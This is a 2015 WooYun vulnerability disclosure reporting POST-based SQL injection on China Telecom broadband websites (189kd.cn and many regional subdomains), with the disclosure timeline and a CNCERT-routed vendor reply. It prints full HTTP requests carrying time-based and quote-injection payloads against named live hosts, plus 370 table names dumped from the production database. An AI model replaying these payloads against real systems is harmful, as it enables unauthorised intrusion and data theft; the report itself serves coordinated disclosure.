当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118567

漏洞标题:中国电信某省宽带业务主站及多个分站post注入漏洞(ROOT)

相关厂商:中国电信

漏洞作者: 新生

提交时间:2015-06-09 10:43

修复时间:2015-07-27 19:14

公开时间:2015-07-27 19:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

多个分站通用注入,疑似被入侵

详细说明:

影响站点(一部分):
http://www.189kd.cn:80/
http://cz.189kd.cn:80/
http://hz.189kd.cn:80/
http://zh.189kd.cn:80/
http://sz.189kd.cn:80/
http://fs.189kd.cn:80/
http://dg.189kd.cn:80/
http://zs.189kd.cn:80/
http://mz.189kd.cn:80/
http://zq.189kd.cn:80/
http://gz.189kd.cn:80/
主站:
POST /01.php HTTP/1.1
Content-Length: 315
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.189kd.cn:80/
Host: www.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=62&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

a.png


分站:
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zq.189kd.cn/
Host: zq.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=nbnetqxq

zq.jpg


POST /01.php HTTP/1.1
Content-Length: 186
Content-Type: application/x-www-form-urlencoded
Referer: http://dg.189kd.cn/
Host: dg.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=19&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=

dg.jpg

还有好多。。。不一一列举了

b.png

贴上主站得表。。
Database: kuandai_189kd
[370 tables]
+-----------------------+
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_bank |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_category |
| v9_category_copy |
| v9_category_priv |
| v9_chanpin |
| v9_chanpin_data |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_cz_news |
| v9_cz_news_data |
| v9_cz_picture |
| v9_cz_picture_data |
| v9_cz_product |
| v9_cz_product_data |
| v9_datacall |
| v9_dbsource |
| v9_dg_news |
| v9_dg_news_data |
| v9_dg_picture |
| v9_dg_picture_data |
| v9_dg_product |
| v9_dg_product_data |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_dxpd |
| v9_dxpd_data |
| v9_extend_setting |
| v9_favorite |
| v9_fs_news |
| v9_fs_news_data |
| v9_fs_picture |
| v9_fs_picture_data |
| v9_fs_product |
| v9_fs_product_data |
| v9_gz_news |
| v9_gz_news_data |
| v9_gz_picture |
| v9_gz_picture_data |
| v9_gz_product |
| v9_gz_product_data |
| v9_hits |
| v9_hn_news |
| v9_hn_news_data |
| v9_hn_product |
| v9_hn_product_data |
| v9_hncd_news |
| v9_hncd_news_data |
| v9_hncd_product |
| v9_hncd_product_data |
| v9_hncs_news |
| v9_hncs_news_data |
| v9_hncs_product |
| v9_hncs_product_data |
| v9_hncz_news |
| v9_hncz_news_data |
| v9_hncz_product |
| v9_hncz_product_data |
| v9_hnhh_news |
| v9_hnhh_news_data |
| v9_hnhh_product |
| v9_hnhh_product_data |
| v9_hnhy_news |
| v9_hnhy_news_data |
| v9_hnhy_product |
| v9_hnhy_product_data |
| v9_hnld_news |
| v9_hnld_news_data |
| v9_hnld_product |
| v9_hnld_product_data |
| v9_hnsy_news |
| v9_hnsy_news_data |
| v9_hnsy_product |
| v9_hnsy_product_data |
| v9_hnxt_news |
| v9_hnxt_news_data |
| v9_hnxt_product |
| v9_hnxt_product_data |
| v9_hnyiy_news |
| v9_hnyiy_news_data |
| v9_hnyiy_product |
| v9_hnyiy_product_data |
| v9_hnyy_news |
| v9_hnyy_news_data |
| v9_hnyy_product |
| v9_hnyy_product_data |
| v9_hnyz_news |
| v9_hnyz_news_data |
| v9_hnyz_product |
| v9_hnyz_product_data |
| v9_hnzjj_news |
| v9_hnzjj_news_data |
| v9_hnzjj_product |
| v9_hnzjj_product_data |
| v9_hnzz_news |
| v9_hnzz_news_data |
| v9_hnzz_product |
| v9_hnzz_product_data |
| v9_hnzzz_news |
| v9_hnzzz_news_data |
| v9_hnzzz_product |
| v9_hnzzz_product_data |
| v9_hy_news |
| v9_hy_news_data |
| v9_hy_picture |
| v9_hy_picture_data |
| v9_hy_product |
| v9_hy_product_data |
| v9_hz_news |
| v9_hz_news_data |
| v9_hz_picture |
| v9_hz_picture_data |
| v9_hz_product |
| v9_hz_product_data |
| v9_ipbanned |
| v9_jm_news |
| v9_jm_news_data |
| v9_jm_picture |
| v9_jm_picture_data |
| v9_jm_product |
| v9_jm_product_data |
| v9_js_news |
| v9_js_news_data |
| v9_js_picture |
| v9_js_picture_data |
| v9_js_product |
| v9_js_product_data |
| v9_jscz_news |
| v9_jscz_news_data |
| v9_jscz_picture |
| v9_jscz_picture_data |
| v9_jsdx_news |
| v9_jsdx_news_data |
| v9_jsdx_picture |
| v9_jsdx_picture_data |
| v9_jsha_news |
| v9_jsha_news_data |
| v9_jsha_product |
| v9_jsha_product_data |
| v9_jslyg_news |
| v9_jslyg_news_data |
| v9_jslyg_product |
| v9_jslyg_product_data |
| v9_jsnt_news |
| v9_jsnt_news_data |
| v9_jsnt_product |
| v9_jsnt_product_data |
| v9_jssq_news |
| v9_jssq_news_data |
| v9_jssq_product |
| v9_jssq_product_data |
| v9_jssz_news |
| v9_jssz_news_data |
| v9_jssz_product |
| v9_jssz_product_data |
| v9_jstz_news |
| v9_jstz_news_data |
| v9_jstz_product |
| v9_jstz_product_data |
| v9_jswx_news |
| v9_jswx_news_data |
| v9_jswx_picture |
| v9_jswx_picture_data |
| v9_jsxz_news |
| v9_jsxz_news_data |
| v9_jsxz_picture |
| v9_jsxz_picture_data |
| v9_jsyc_news |
| v9_jsyc_news_data |
| v9_jsyc_product |
| v9_jsyc_product_data |
| v9_jsyz_news |
| v9_jsyz_news_data |
| v9_jsyz_product |
| v9_jsyz_product_data |
| v9_jszj_news |
| v9_jszj_news_data |
| v9_jszj_product |
| v9_jszj_product_data |
| v9_jy_news |
| v9_jy_news_data |
| v9_jy_picture |
| v9_jy_picture_data |
| v9_jy_product |
| v9_jy_product_data |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_mm_news |
| v9_mm_news_data |
| v9_mm_picture |
| v9_mm_picture_data |
| v9_mm_product |
| v9_mm_product_data |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_mz_news |
| v9_mz_news_data |
| v9_mz_picture |
| v9_mz_picture_data |
| v9_mz_product |
| v9_mz_product_data |
| v9_news |
| v9_news_data |
| v9_nj_news |
| v9_nj_news_data |
| v9_nj_picture |
| v9_nj_picture_data |
| v9_nj_product |
| v9_nj_product_data |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_data |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201409 |
| v9_poster_201410 |
| v9_poster_201411 |
| v9_poster_201504 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_sg_news |
| v9_sg_news_data |
| v9_sg_picture |
| v9_sg_picture_data |
| v9_sg_product |
| v9_sg_product_data |
| v9_sh_news |
| v9_sh_news_data |
| v9_sh_picture |
| v9_sh_picture_data |
| v9_sh_product |
| v9_sh_product_data |
| v9_shouji |
| v9_shouji_data |
| v9_site |
| v9_sms_report |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_st_news |
| v9_st_news_data |
| v9_st_picture |
| v9_st_picture_data |
| v9_st_product |
| v9_st_product_data |
| v9_sw_news |
| v9_sw_news_data |
| v9_sw_picture |
| v9_sw_picture_data |
| v9_sw_product |
| v9_sw_product_data |
| v9_sz_news |
| v9_sz_news_data |
| v9_sz_picture |
| v9_sz_picture_data |
| v9_sz_product |
| v9_sz_product_data |
| v9_sz_shouji |
| v9_sz_shouji_data |
| v9_tag |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_video_store |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_yf_news |
| v9_yf_news_data |
| v9_yf_picture |
| v9_yf_picture_data |
| v9_yf_product |
| v9_yf_product_data |
| v9_yj2_news |
| v9_yj2_news_data |
| v9_yj2_picture |
| v9_yj2_picture_data |
| v9_yj2_product |
| v9_yj2_product_data |
| v9_yj_news |
| v9_yj_news_data |
| v9_yj_picture |
| v9_yj_picture_data |
| v9_yj_product |
| v9_yj_product_data |
| v9_zh_news |
| v9_zh_news_data |
| v9_zh_picture |
| v9_zh_picture_data |
| v9_zh_product |
| v9_zh_product_data |
| v9_zj_news |
| v9_zj_news_data |
| v9_zj_picture |
| v9_zj_picture_data |
| v9_zj_product |
| v9_zj_product_data |
| v9_zq_news |
| v9_zq_news_data |
| v9_zq_picture |
| v9_zq_picture_data |
| v9_zq_product |
| v9_zq_product_data |
| v9_zs_news |
| v9_zs_news_data |
| v9_zs_picture |
| v9_zs_picture_data |
| v9_zs_product |
| v9_zs_product_data |
| v9_zxd |
| v9_zxxd |
+-----------------------+
往下不继续了。。。

漏洞证明:

POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://mz.189kd.cn/
Host: mz.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zq.189kd.cn/
Host: zq.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=nbnetqxq
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zs.189kd.cn/
Host: zs.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=urquxvdx

b.png

修复方案:

版权声明:转载请注明来源 新生@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-06-12 19:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评论